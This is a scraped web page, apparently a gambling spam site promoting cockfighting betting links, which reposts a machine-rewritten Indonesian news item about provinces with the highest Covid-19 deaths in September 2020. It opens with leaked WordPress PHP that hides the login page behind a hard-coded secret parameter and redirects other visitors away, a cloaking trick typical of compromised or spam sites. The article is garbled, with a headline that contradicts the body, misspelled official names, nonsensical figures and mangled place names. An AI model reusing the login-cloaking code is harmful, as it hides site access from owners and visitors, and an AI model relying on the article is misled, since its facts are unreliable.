//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Bali, Jakarta, dan Kalimantan Timur merupakan tiga provinsi dengan angka kematian Covid-19 tertinggi | adu ayam bali_s128.net login_s128.live

Bali, Jakarta, dan Kalimantan Timur merupakan tiga provinsi dengan angka kematian Covid-19 tertinggi

JAKARTA TRIBUNNEWS.COM-Pekan lalu, tiga provinsi di Indonesia memiliki angka kematian akibat Covid-19 tertinggi. Ketiga provinsi tersebut adalah Bali, DKI Jakarta dan Kalimantan Timur. Dipublikasikan di YouTube oleh Sekretariat Presiden, Kamis (17/9/2020). Menurut Wiku, provinsi dengan kematian akibat corona paling banyak pada pekan lalu adalah Jawa Timur. 218 kematian telah dicatat dalam seminggu terakhir.

“Minggu lalu, Jawa Timur memiliki jumlah kematian tambahan terbesar per minggu, dengan 218 kematian,” kata Wiku.

Di saat bersamaan, Sumatera Barat telah menjadi provinsi yang semakin meningkat. Persentase kematian tertinggi. Populasi Sumatera Barat meningkat 150% minggu lalu.

Weiku mengatakan bahwa ada lebih dari 1.000 kasus aktif di 11 wilayah atau kota.

11 daerah atau kota tersebut adalah Semarang, Medan, Bekasi, Makassar, Jakarta Utara, Jakarta Pusat, Jakarta Barat, Bupati Bekasi, Jakarta Timur, Surabaya dan Utara Kota Ganbaru. Viku berkata: “Ini kota besar.” Kasus aktif di 11 daerah atau kota menyumbang 26% dari kasus aktif di Indonesia.

Oleh karena itu, ia yakin jika kasus aktif di 11 wilayah atau kota dapat dihapus, hal ini akan berdampak besar pada pengurangan kasus aktif di seluruh negeri.

Leave a comment

adu ayam bali_s128.net login_s128.live